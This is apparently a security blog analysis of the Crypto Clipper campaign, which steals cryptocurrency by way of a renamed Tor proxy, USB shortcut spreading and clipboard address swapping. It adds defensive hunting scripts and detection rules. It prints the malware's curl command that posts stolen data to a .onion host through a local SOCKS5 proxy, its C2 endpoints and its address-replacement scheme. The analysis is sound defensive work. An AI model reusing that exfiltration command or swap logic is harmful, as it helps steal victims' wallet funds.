You just need the internet's most widely deployed anonymity network—and it's already listening on localhost:9050.
Crypto Clipper isn't the first clipboard stealer, and it won't be the last. But what sets this campaign apart isn't what it steals—seed phrases, private keys, wallet addresses—but how it exfiltrates that loot without raising a flag.
Instead of phoning home to a static IP, it fires up a local Tor proxy, routes every HTTP request through SOCKS5, and talks to a .onion endpoint. The result? Firewall logs stay silent. DNS queries never leave the machine. And what looks like local network chatter is, in fact, a full-blown digital heist.
Here's exactly how it works: the renamed Tor binary (ugate.exe), the 500ms clipboard inspection loop, the address replacement tricks that fool users into sending funds to attackers, and an EVAL command that turns the clipper into a full backdoor.
This isn't theory. Microsoft Defender tracks it as Trojan:Win32/CryptoBandits.A, and it's been active since February 2026. The code is simple, the tactics are dirty—and it's working.
The proxy trick is the key insight
Most crypto stealers blast data to external IP addresses. That gives defenders easy hunting signatures: suspicious outbound connections, DNS lookups for known C2 domains, or patterns like Python spawning netcat.
Crypto Clipper dodges all of that.
Right after infection, it drops and executes a renamed Tor binary called ugate.exe. No installer. No GUI. Just a headless proxy server listening on the standard Tor port: 127.0.0.1:9050.
Once that proxy boots, the malware doesn't call an external domain directly. Instead, it tells curl to use that local proxy:
curl --proxy socks5h://127.0.0.1:9050 -X POST https://<domain>.onion/route.php
The SOCKS5 protocol is deceptively simple. The client hands the proxy a destination host and port, and the proxy relays the TCP stream on its behalf. With the socks5h:// scheme, curl also leaves hostname resolution to the proxy, so the .onion name is resolved inside the Tor network rather than by the operating system. To your host's firewall, traffic looks like this:
- Local process (cryptoclipper.exe) → localhost:9050 (SOCKS5)
There's no DNS resolution at the OS level, so tools that rely on network-sniffing or log-based detection can't see where the traffic really ends up. All you get is 127.0.0.1:9050—a port that's commonly used by legitimate privacy tools.
This is why Microsoft calls localhost:9050 activity "the strongest signal" and turns the usual approach on its head: instead of hunting IPs or domains, defenders should hunt for local proxy abuse.
"localhost:9050 activity, especially when coupled with suspicious scripting behavior, is also valuable context for triage." — Microsoft Security Blog
But even with that signal, you have to look in the right place. That's why we dig into how the malware is really structured.
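One way to act on that signal is to check who actually owns the 127.0.0.1:9050 listener. The following is an added example, not code from the article or from Microsoft: it takes a socket table and a process list (both constructed here; on a real host you would feed in your EDR's or netstat's inventory) and flags a 9050 listener whose image name is not a recognised Tor binary, that runs from the world-writable Public profile, or that was spawned by a script host. The path of ugate.exe and the parent process names are assumptions for the sample.

```python
"""Hunt for a SOCKS5 listener on 127.0.0.1:9050 that is not a recognisable Tor process.

Added example, not the article's or Microsoft's code. The socket table and process
list are constructed; the ugate.exe path and parent names are assumptions.
"""
from dataclasses import dataclass

TOR_SOCKS_PORT = 9050
# Image names under which a legitimate Tor client normally listens (assumption).
KNOWN_TOR_IMAGES = {"tor.exe"}
# Script hosts whose children listening on 9050 deserve a second look (from the article).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
PUBLIC_PROFILE = "c:\\users\\public\\"


@dataclass(frozen=True)
class Listener:
    pid: int
    laddr: str
    lport: int


@dataclass(frozen=True)
class Process:
    pid: int
    image: str
    path: str
    parent_image: str


def suspicious_tor_listeners(listeners, processes):
    """Return (pid, image, reason) for every 127.0.0.1:9050 listener that looks wrong."""
    by_pid = {p.pid: p for p in processes}
    findings = []
    for sock in listeners:
        if (sock.laddr, sock.lport) != ("127.0.0.1", TOR_SOCKS_PORT):
            continue
        proc = by_pid.get(sock.pid)
        if proc is None:
            findings.append((sock.pid, "<unknown>", "9050 listener with no process record"))
            continue
        reasons = []
        if proc.image.lower() not in KNOWN_TOR_IMAGES:
            reasons.append(f"{proc.image} is not a known Tor image name")
        if proc.path.lower().startswith(PUBLIC_PROFILE):
            reasons.append("runs from the world-writable Public profile")
        if proc.parent_image.lower() in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {proc.parent_image}")
        if reasons:
            findings.append((sock.pid, proc.image, "; ".join(reasons)))
    return findings


# Constructed sample: a user's own Tor client, the renamed Tor dropped by the worm,
# and an unrelated web server on another port.
SAMPLE_LISTENERS = [
    Listener(4120, "127.0.0.1", 9050),
    Listener(5532, "127.0.0.1", 9050),
    Listener(7001, "0.0.0.0", 8080),
]
SAMPLE_PROCESSES = [
    Process(4120, "tor.exe", r"C:\Users\alice\AppData\Local\Tor\tor.exe", "explorer.exe"),
    Process(5532, "ugate.exe", r"C:\Users\Public\Documents\ugate.exe", "wscript.exe"),
    Process(7001, "nginx.exe", r"C:\nginx\nginx.exe", "services.exe"),
]

if __name__ == "__main__":
    for pid, image, reason in suspicious_tor_listeners(SAMPLE_LISTENERS, SAMPLE_PROCESSES):
        print(f"PID {pid} ({image}): {reason}")
```

On the sample only PID 5532 is reported, with all three reasons. A user's own tor.exe on 9050 stays quiet, which is the point: the hunt is for a 9050 listener that does not look like Tor, not for Tor itself.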
The two-part payload: worm + clipper
Crypto Clipper isn't a single binary. It's a two-stage attack:
- Worm component — spreads the infection across USB drives by creating malicious shortcuts.
- Clipper/stealer component — harvests wallet data and sends it through the SOCKS5 proxy.
Initial access comes from malicious .lnk files planted on USB drives. When a user opens what looks like financials.docx.lnk, they're launching the worm first.
The worm does three things:
- Scans the USB drive for documents (.doc, .xlsx, .pdf).
- Hides the original file and creates a matching shortcut that points to the worm payload.
- Drops encrypted payloads (two JavaScript files) into C:\Users\Public\Documents.
Once executed, the worm sets up persistence with two scheduled tasks:
- One repeatedly scans for new USB drives and reinfects them.
- The other launches the clipboard-stealing payload on a loop.
The anti-analysis check is crude but effective: it queries Win32_Process and exits if TaskManager.exe is detected. That's enough to slow manual triage—especially when defenders see a benign-looking .lnk file and assume it's harmless.
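The hide-and-replace trick leaves a simple footprint on the drive: a .lnk whose name ends in a document extension, with the real document sitting hidden next to it. The script below is an added example, not the article's or Microsoft's code, that scans a directory listing for exactly that pairing. The listing is constructed; in practice you would walk the removable drive with os.scandir and read the hidden attribute from each entry. The extension list is the article's (.doc, .xlsx, .pdf) plus .docx from the lure name.

```python
"""Flag document-lookalike shortcuts on a removable drive.

Added example, not from the article or Microsoft. Directory entries are constructed.
"""
from pathlib import PureWindowsPath

# Document extensions the worm targets per the article, plus .docx from the lure name.
DOC_EXTS = {".doc", ".docx", ".xlsx", ".pdf"}


def masquerading_shortcuts(entries):
    """entries: iterable of (filename, is_hidden) for one directory.

    Returns (shortcut_name, reason) for each .lnk whose name ends in a document
    extension, noting when the original document sits hidden beside it."""
    entries = list(entries)
    hidden = {name for name, is_hidden in entries if is_hidden}
    hits = []
    for name, _ in entries:
        path = PureWindowsPath(name)
        if path.suffix.lower() != ".lnk":
            continue
        stem = path.stem                                   # e.g. "financials.docx"
        if PureWindowsPath(stem).suffix.lower() not in DOC_EXTS:
            continue
        reason = "shortcut named like a document"
        if stem in hidden:
            reason += "; matching original is hidden alongside it"
        hits.append((name, reason))
    return hits


# Constructed listing of an infected drive's root.
SAMPLE_DIR = [
    ("financials.docx.lnk", False),
    ("financials.docx", True),
    ("budget.xlsx.lnk", False),
    ("budget.xlsx", True),
    ("notes.txt", False),
    ("Shortcut to Printer.lnk", False),
]

if __name__ == "__main__":
    for name, reason in masquerading_shortcuts(SAMPLE_DIR):
        print(f"{name}: {reason}")
```

A shortcut with a document-style name is suspicious on its own; the hidden twin turns it into a near-certain infection marker and is the cue to pull the drive for forensic imaging rather than cleaning it in place.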
Related threat intel: USB-based malware vectors continue to evolve. See our analysis of how a Bluetooth speaker firmware flaw turns peripherals into remote code execution devices for another example of trusted hardware becoming an attack vector.
SOCKS5 is the C2 channel—and it's not obvious
You won't see an IP in the process tree. You won't find a DNS query for the C2 domain.
Crypto Clipper uses HTTP-over-SOCKS5. That means:
- All C2 traffic goes to 127.0.0.1:9050.
- The actual destination (e.g., xyz123.onion) is resolved by the Tor proxy.
- To Windows networking APIs, it looks like local traffic to a well-known port.
Microsoft Defender XDR picks up:
- Possible data exfiltration using curl
- Behavior:Win64/CurlOnion.STA
But most traditional endpoint protections miss this pattern because they don't correlate script execution with SOCKS5 behavior.
The C2 endpoints are simple and well-defined:
| Endpoint | Purpose |
|---|---|
| /route.php | Beacon + command retrieval |
| /recvf.php | Screenshot upload |
| /stub.php | Payload download |
Authentication uses a victim GUID combined with geolocation (GEIP), so the attacker can track which devices are "active" and avoid re-targeting already compromised systems.
Clipboard monitoring: the 500ms loop
Once ugate.exe finishes bootstrapping (~60 seconds), the malware enters a polling loop:
- Query clipboard every ~500 milliseconds.
- Parse contents for crypto-related patterns:
- 12- or 24-word BIP39 seed phrases
- Bitcoin WIF and Ethereum private keys
- Wallet addresses (Bitcoin legacy/P2SH/taproot/Bech32, Tron, Monero)
The clipboard parser isn't clever: it scans for regex-like patterns that match common wallet formats. A seed phrase usually appears as a 12- or 24-word string, sometimes with separators like hyphens or newlines.
When it finds a match:
- The data gets saved to a local file (for fallback).
- A POST request is sent over the SOCKS5 proxy to the C2.
- If the upload fails, it retries until acknowledged—then deletes the local backup.
That retry loop is important. The malware behaves like a well-coded client: persistent, but careful not to leak data repeatedly.
Address replacement: making funds vanish silently
The most insidious feature isn't stealing keys—it's replacing them.
When a user copies a legitimate wallet address to paste into an exchange or wallet, Crypto Clipper swaps it for the attacker's address before the paste happens.
Here's how it handles different formats:
| Address Type | Pattern Match | Replacement Strategy |
|---|---|---|
| Bitcoin Legacy (start: 1) | 32–36 chars | Replace first two characters |
| Bitcoin P2SH (start: 3) | 32–36 chars | Replace first two characters |
| Bitcoin Taproot (start: bc1p) | 40–64 chars | Replace last character |
| Bitcoin Bech32 (start: bc1q) | 40–64 chars | Replace last character |
| Tron (start: T) | exactly 34 chars | Replace first two characters |
| Monero (start: 4 or 8) | exactly 95 chars | Replace whole string |
The replacement happens in-place, so the user sees what looks like a valid address and doesn't notice anything wrong—until they check their blockchain explorer.
The malware includes a function (checkC2Command) that can trigger address replacement in real time, making the attack more reliable than static scripts.
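From the defender's side, the swap has a distinctive shape: the clipboard changes from one address to another of the same family without the user copying anything. The following is an added example, not code from the article or Microsoft, that classifies clipboard strings using the article's table and flags a same-family rewrite between two observations. The events are constructed, and the "user-copy" versus "poll" labels assume a clipboard monitor that can attribute a change to the foreground application; the addresses are synthetic strings built only to satisfy the table's prefix and length rules.

```python
"""Detect a clipboard rewrite: a wallet address replaced by another address of the
same family with no user copy in between.

Added example, not code from the article or Microsoft. Events are constructed and the
'user-copy' / 'poll' labels assume an attributing clipboard monitor.
"""

# (family, prefix, min_len, max_len), taken from the article's address table.
ADDRESS_RULES = [
    ("bitcoin-taproot", "bc1p", 40, 64),
    ("bitcoin-bech32", "bc1q", 40, 64),
    ("bitcoin-legacy", "1", 32, 36),
    ("bitcoin-p2sh", "3", 32, 36),
    ("tron", "T", 34, 34),
    ("monero", "4", 95, 95),
    ("monero", "8", 95, 95),
]


def classify_address(text):
    """Return the address family of a clipboard string, or None if it matches nothing."""
    s = text.strip()
    if not s.isalnum():
        return None
    for family, prefix, lo, hi in ADDRESS_RULES:
        if s.startswith(prefix) and lo <= len(s) <= hi:
            return family
    return None


def first_difference(a, b):
    """Index of the first differing character (shorter length if one is a prefix of the other)."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return min(len(a), len(b))


def detect_rewrites(events):
    """events: list of (t_seconds, kind, content) with kind 'user-copy' or 'poll'.

    A 'user-copy' records what the user placed on the clipboard; a 'poll' records what
    is there now. Any poll that differs from the last observation was not caused by the
    user, and if both values are addresses of the same family it is reported as
    (t, family, old, new, changed_at)."""
    findings = []
    last = None
    for t, kind, content in events:
        if kind == "poll" and last is not None and content != last:
            old_fam, new_fam = classify_address(last), classify_address(content)
            if old_fam is not None and old_fam == new_fam:
                findings.append((t, old_fam, last, content, first_difference(last, content)))
        last = content
    return findings


# Constructed synthetic addresses: valid only against the table's prefix/length rules.
USER_BTC = "1" + "A" * 33
SWAPPED_BTC = "1" + "B" * 33
USER_BECH32 = "bc1q" + "a" * 38
SWAPPED_BECH32 = "bc1q" + "a" * 37 + "b"

SAMPLE_EVENTS = [
    (0.0, "user-copy", USER_BTC),
    (0.5, "poll", USER_BTC),
    (1.0, "poll", SWAPPED_BTC),          # rewritten with no user action
    (5.0, "user-copy", "meeting at 3pm"),
    (5.5, "poll", "meeting at 3pm"),     # ordinary text, ignored
    (8.0, "user-copy", USER_BECH32),
    (8.5, "poll", SWAPPED_BECH32),       # rewritten before the first poll saw the original
    (9.0, "poll", SWAPPED_BECH32),
]

if __name__ == "__main__":
    for t, family, old, new, at in detect_rewrites(SAMPLE_EVENTS):
        print(f"t={t}s {family}: {old} -> {new} (first change at index {at})")
```

The changed_at index is what makes the finding actionable in triage: a legacy address differing within its first two characters, or a bech32 address differing only in its last character, lines up with the strategies in the table above and separates a clipper from an ordinary clipboard manager that rewrote text for some other reason.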
Remote code execution: when a clipper becomes a backdoor
Most crypto stealers are dead ends once the loot is taken. Crypto Clipper keeps talking back.
The C2 can return an EVAL response. When that happens, the malware:
- Downloads a file named cfile from /stub.php.
- Executes the contents as JScript code.
That turns the clipper into a lightweight backdoor—no installer needed, just arbitrary script execution. The payload can:
- Download additional malware (Ransomware-as-a-Service, information stealers)
- Elevate privileges
- Pivot to other hosts on the network
Microsoft calls this "remote code execution, elevating the threat level far beyond a standard clipper."
The EVAL feature is a forcing function for defenders: if you see script execution after clipboard activity, treat it as compromised until proven otherwise.
Screenshots aren't just for show
The malware takes five screenshots, ten seconds apart. Why?
Screen captures serve three purposes:
- Confirm wallet balance — Did the stolen seed phrase actually have funds?
- Identify hardware wallets — UI elements (Ledger/Trezor screens, MetaMask overlays) indicate device type.
- Verify address replacement — Check if the swap succeeded or if user noticed a mismatch.
Screenshots get uploaded via /recvf.php, asynchronously over Tor—no blocking, no UI stall.
The timing (10 seconds apart) suggests the attacker wants to watch wallet activity unfold, not just get a single snapshot.
Defense evasion: obfuscation layered like an onion
The malware uses multiple layers of protection:
- Installer is a Python script obfuscated with PyArmor, packaged as a standalone executable (PyInstaller).
- JavaScript payloads use dual-layer obfuscation to hinder static analysis.
- A basic anti-analysis check halts execution if Task Manager is detected.
This multi-stage approach reduces static visibility. Tools like strings or pefile can't easily pull readable strings from the obfuscated binary—forcing defenders to run it in a sandbox.
But even sandboxes miss the trick: because ugate.exe is a renamed Tor binary, behavioral sandboxing might classify it as "non-malicious" if the tool doesn't recognize that the malware also spawns curl with SOCKS5 options.
That's why behavioral hunting matters more than static analysis here.
Detection signals: look for script-to-network chains
Microsoft recommends defenders hunt for three intersecting behaviors:
- Script interpreters spawning suspicious children — wscript.exe, cscript.exe, or PowerShell launching curl, cmd.exe, or screen-capture utilities.
- Local SOCKS5 proxy abuse — 127.0.0.1:9050 activity paired with script execution.
- Clipboard inspection or wallet-address replacement — File creation patterns in C:\Users\Public\Documents with the GOOD path or cfile.
The most reliable detection vector:
WScript launching curl with SOCKS5 options
Microsoft Defender XDR flags:
- EDR Suspicious JavaScript process
- Possible data exfiltration using curl
- Behavior:Win64/CurlOnion.STA
But generic AV won't catch this. You need endpoint detection and response (EDR) that correlates scripting behavior with network proxy usage.
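The three behaviors above are cheap to correlate once process-create and file-create telemetry sits in one stream. The code below is an added example, not Microsoft's or the article's detection logic: it evaluates Sysmon-style process-create (event id 1) and file-create (event id 11) records against four rules covering script host to curl with a local SOCKS5 proxy, a .onion destination, a PowerShell screen capture, and a drop into C:\Users\Public\Documents under the GOOD path or cfile names the article lists. The events are constructed, the .onion host is a placeholder, and the CopyFromScreen keyword used as the screen-capture hint is an assumption.

```python
"""Correlate script-host process chains with local SOCKS5 use and drop-path file writes.

Added example, not Microsoft's or the article's code. Events are constructed; the
.onion host is a placeholder and the CopyFromScreen hint is an assumption.
"""
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe"}
NETWORK_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe"}
LOCAL_SOCKS = "127.0.0.1:9050"
DROP_DIR = "c:\\users\\public\\documents\\"
DROP_MARKERS = {"cfile", "good"}            # artefact names from the article, lower-cased
SCREEN_CAPTURE_HINTS = ("copyfromscreen",)  # assumption used as a heuristic


def _base(image):
    """Lower-cased file name of an image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return a list of (rule_id, description) hits for one event dict."""
    hits = []
    if event["id"] == 1:
        parent, child = _base(event["parent_image"]), _base(event["image"])
        cmd = event.get("command_line", "").lower()
        if parent in SCRIPT_HOSTS and child in NETWORK_CHILDREN:
            if LOCAL_SOCKS in cmd and "socks5" in cmd:
                hits.append(("R1", f"{parent} -> {child} via local SOCKS5 proxy"))
            if ".onion" in cmd:
                hits.append(("R2", f"{parent} -> {child} targeting a .onion host"))
            if any(h in cmd for h in SCREEN_CAPTURE_HINTS):
                hits.append(("R3", f"{parent} -> {child} screen capture"))
    elif event["id"] == 11:
        target = event["target"].lower()
        if target.startswith(DROP_DIR):
            segments = set(target[len(DROP_DIR):].split("\\"))
            if segments & DROP_MARKERS:
                hits.append(("R4", f"drop artefact in Public\\Documents: {event['target']}"))
    return hits


def scan(events):
    """Flatten hits across an event stream as (seq, rule_id, description)."""
    return [(e["seq"], rule, desc) for e in events for rule, desc in evaluate(e)]


# Constructed Sysmon-style records: one infected chain, two benign look-alikes.
SAMPLE_EVENTS = [
    {"seq": 1, "id": 1, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl --proxy socks5h://127.0.0.1:9050 -X POST https://PLACEHOLDER.onion/route.php"},
    {"seq": 2, "id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl https://example.com/update.json"},
    {"seq": 3, "id": 1, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c <constructed script that calls CopyFromScreen>"},
    {"seq": 4, "id": 11, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\Public\Documents\cfile"},
    {"seq": 5, "id": 11, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "target": r"C:\Users\Public\Documents\quarterly.docx"},
]

if __name__ == "__main__":
    for seq, rule, desc in scan(SAMPLE_EVENTS):
        print(f"event {seq} {rule}: {desc}")
```

Rule R1 on its own is the high-confidence hit the article points at (WScript launching curl with SOCKS5 options); R2 through R4 are the supporting context that lets you escalate a single alert into an incident rather than a ticket.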
Hardening recommendations: why blocking .lnk isn't enough
Blocking .lnk execution via Group Policy helps—but it's not a silver bullet.
Microsoft recommends:
- Disable AutoRun/AutoPlay for all removable media.
- Block .lnk execution from USB drives via GPO.
- Restrict unnecessary use of wscript.exe and cscript.exe—especially in non-admin contexts.
- Review and enable Attack Surface Reduction (ASR) rules for obfuscated scripts and suspicious child-process chains.
- Hunt for localhost SOCKS5 activity (127.0.0.1:9050) combined with PowerShell screen-capture commands.
A few final notes:
- Even if you don't use USB devices, this malware can pivot laterally via SMB shares if credentials are leaked.
- If you handle cryptocurrency, monitor clipboard access at the application layer. Some enterprise DLP tools can detect clipboard swaps.
- Test your detection coverage by replaying curl --proxy socks5h://127.0.0.1:9050 in a sandbox and seeing what alerts fire (or don't).
The real lesson: Tor isn't the villain—local proxy use is
Tor itself isn't malicious. But when malware embeds a local SOCKS5 proxy and repurposes it for command-and-control, you get something scarier than a simple stealer: an anonymous conduit that bypasses traditional security controls.
The Crypto Clipper campaign shows how small architectural choices—a renamed Tor binary, localhost:9050, HTTP-over-SOCKS5—can dramatically increase operational security for attackers while reducing detection surface for defenders.
Your job isn't to block Tor. Your job is to detect when local proxies start behaving like C2 channels.
This article used verified sources only:
- Microsoft Security Blog: Crypto Clipper uses Tor and worm-like propagation for persistence and control
- Cyber Press: Hackers Use Tor-Routed C2 and Local SOCKS5 Proxy to Control Crypto Clipper Malware
- BetaNews: Crypto Clipper uses USB drives and Tor to steal wallet data
If you found this deep dive useful, share it with your security team. The next clipper won't look like this—but the SOCKS5 trick will almost certainly persist.
